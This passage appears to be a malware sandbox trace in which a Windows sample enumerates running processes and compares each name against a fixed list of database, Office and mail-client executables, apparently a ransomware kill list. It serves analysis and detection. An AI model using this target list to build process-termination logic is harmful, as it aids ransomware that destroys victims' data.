lpString2="xfssvccon.exe") returned -1 [0055.971] lstrcmpiW (lpString1="System", lpString2="mydesktopservice.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="ocautoupds.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="encsvc.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="firefoxconfig.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="tbirdconfig.exe") returned -1 [0055.971] lstrcmpiW (lpString1="System", lpString2="ocomm.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="mysqld.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="mysqld-nt") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="mysqld-opt") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="dbeng50.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="sqbcoreservice.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="excel.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="infopath.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="msaccess.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="mspub.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="onenote.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="outlook.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="powerpnt.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="stream.exe") returned 1 [0055.972] lstrcmpiW (lpString1="System", lpString2="thebat.exe") returned -1 [0055.972] lstrcmpiW (lpString1="System", lpString2="thebat64.exe") returned -1 [0055.972] lstrcmpiW (lpString1="System", lpString2="Thunderbird.exe") returned -1 [0055.972] lstrcmpiW (lpString1="System", lpString2="visio.exe") returned -1 [0055.972] lstrcmpiW (lpString1="System", lpString2="winword.exe") returned -1 [0055.972] lstrcmpiW (lpString1="System", lpString2="wordpad.exe") returned -1 [0055.972] lstrcmpiW (lpString1="System", lpString2="sqlwb.exe") returned 1 [0055.972] lstrcmpiW (lpString1="System", lpString2="sqlbrowser.exe") returned 1 [0055.972] lstrcmpiW (lpString1="System", lpString2="agntsvcagntsvc.exe") returned 1 [0055.972] lstrcmpiW (lpString1="System", lpString2="agntsvcencsvc.exe") returned 1 [0055.972] lstrcmpiW (lpString1="System", lpString2="agntsvcisqlplussvc.exe") returned 1 [0055.972] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="SearchIndexer.exesqlservr.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="msftesql.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="sqlagent.exe") returned -1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="sqlwriter.exe") returned -1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="oracle.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="ocssd.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="dbsnmp.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="synctime.exe") returned -1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="mydesktopqos.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="agntsvc.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="isqlpplussvc.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="isqlpussvc.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="xfssvccon.exe") returned -1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="mydesktopservice.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="ocautoupds.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="encsvc.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="firefoxconfig.exe") returned 1 [0055.973] lstrcmpiW (lpString1="smss.exe", lpString2="tbirdconfig.exe") returned -1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="ocomm.exe") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="mysqld.exe") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="mysqld-nt") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="mysqld-opt") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="dbeng50.exe") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="sqbcoreservice.exe") returned -1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="excel.exe") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="infopath.exe") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="msaccess.exe") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="mspub.exe") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="onenote.exe") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="outlook.exe") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="powerpnt.exe") returned 1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="stream.exe") returned -1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="thebat.exe") returned -1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="thebat64.exe") returned -1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="Thunderbird.exe") returned -1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="visio.exe") returned -1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="winword.exe") returned -1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="wordpad.exe") returned -1 [0055.974] lstrcmpiW (lpString1="smss.exe", lpString2="sqlwb.exe") returned -1 [0055.975] lstrcmpiW (lpString1="smss.exe", lpString2="sqlbrowser.exe") returned -1 [0055.975] lstrcmpiW (lpString1="smss.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0055.975] lstrcmpiW (lpString1="smss.exe", lpString2="agntsvcencsvc.exe") returned 1 [0055.975] lstrcmpiW (lpString1="smss.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0055.975] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="msftesql.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlagent.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlwriter.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="oracle.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="ocssd.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="dbsnmp.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="synctime.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="mydesktopqos.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="agntsvc.exe") returned 1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="isqlpplussvc.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="isqlpussvc.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="xfssvccon.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="mydesktopservice.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="ocautoupds.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="encsvc.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="firefoxconfig.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="tbirdconfig.exe") returned -1 [0055.976] lstrcmpiW (lpString1="csrss.exe", lpString2="ocomm.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld-nt") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld-opt") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="dbeng50.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="sqbcoreservice.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="excel.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="infopath.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="msaccess.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="mspub.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="onenote.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="outlook.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="powerpnt.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="stream.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="thebat.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="thebat64.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="Thunderbird.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="visio.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="winword.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="wordpad.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlwb.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlbrowser.exe") returned -1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="agntsvcencsvc.exe") returned 1 [0055.977] lstrcmpiW (lpString1="csrss.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0055.977] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.978] lstrcmpiW (lpString1="wininit.exe", lpString2="SearchIndexer.exesqlservr.exe") returned 1 [0055.978] lstrcmpiW (lpString1="wininit.exe", lpString2="msftesql.exe") returned 1 [0055.978] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlagent.exe") returned 1 [0055.978] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlwriter.exe") returned 1 [0055.978] lstrcmpiW (lpString1="wininit.exe", lpString2="oracle.exe") returned 1 [0055.978] lstrcmpiW (lpString1="wininit.exe", lpString2="ocssd.exe") returned 1 [0055.978] lstrcmpiW (lpString1="wininit.exe", lpString2="dbsnmp.exe") returned 1 [0055.978] lstrcmpiW (lpString1="wininit.exe", lpString2="synctime.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="mydesktopqos.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="agntsvc.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="isqlpplussvc.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="isqlpussvc.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="xfssvccon.exe") returned -1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="mydesktopservice.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="ocautoupds.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="encsvc.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="firefoxconfig.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="tbirdconfig.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="ocomm.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="mysqld.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="mysqld-nt") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="mysqld-opt") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="dbeng50.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="sqbcoreservice.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="excel.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="infopath.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="msaccess.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="mspub.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="onenote.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="outlook.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="powerpnt.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="stream.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="thebat.exe") returned 1 [0055.979] lstrcmpiW (lpString1="wininit.exe", lpString2="thebat64.exe") returned 1 [0055.980] lstrcmpiW (lpString1="wininit.exe", lpString2="Thunderbird.exe") returned 1 [0055.980] lstrcmpiW (lpString1="wininit.exe", lpString2="visio.exe") returned 1 [0055.980] lstrcmpiW (lpString1="wininit.exe", lpString2="winword.exe") returned -1 [0055.980] lstrcmpiW (lpString1="wininit.exe", lpString2="wordpad.exe") returned -1 [0055.980] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlwb.exe") returned 1 [0055.980] lstrcmpiW (lpString1="wininit.exe", lpString2="sqlbrowser.exe") returned 1 [0055.980] lstrcmpiW (lpString1="wininit.exe", lpString2="agntsvcagntsvc.exe") returned 1 [0055.980] lstrcmpiW (lpString1="wininit.exe", lpString2="agntsvcencsvc.exe") returned 1 [0055.980] lstrcmpiW (lpString1="wininit.exe", lpString2="agntsvcisqlplussvc.exe") returned 1 [0055.980] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="msftesql.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlagent.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlwriter.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="oracle.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="ocssd.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="dbsnmp.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="synctime.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="mydesktopqos.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="agntsvc.exe") returned 1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="isqlpplussvc.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="isqlpussvc.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="xfssvccon.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="mydesktopservice.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="ocautoupds.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="encsvc.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="firefoxconfig.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="tbirdconfig.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="ocomm.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld.exe") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld-nt") returned -1 [0055.981] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld-opt") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="dbeng50.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="sqbcoreservice.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="excel.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="infopath.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="msaccess.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="mspub.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="onenote.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="outlook.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="powerpnt.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="stream.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="thebat.exe") returned -1 [0055.982] lstrcmpiW (lpString1="csrss.exe", lpString2="thebat64.exe") returned -1 [0055.982] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.983] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.984] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.985] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0055.986] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.986] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.987] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.988] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.989] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.990] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0055.991] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.000] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.001] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.002] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.003] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.004] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.005] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0056.005] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0056.006] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="expense.exe")) returned 1 [0056.007] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="restructuring.exe")) returned 1 [0056.008] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="seem.exe")) returned 1 [0056.009] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="und-rica.exe")) returned 1 [0056.010] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fighters.exe")) returned 1 [0056.011] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dimensions flyer.exe")) returned 1 [0056.012] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="des.exe")) returned 1 [0056.013] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="casting.exe")) returned 1 [0056.014] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="morrison-consult.exe")) returned 1 [0056.015] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="targeted.exe")) returned 1 [0056.015] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="modify_vital_consider.exe")) returned 1 [0056.016] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omega hiv.exe")) returned 1 [0056.017] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="strike_grid_ringtones.exe")) returned 1 [0056.017] Process32NextW (in: 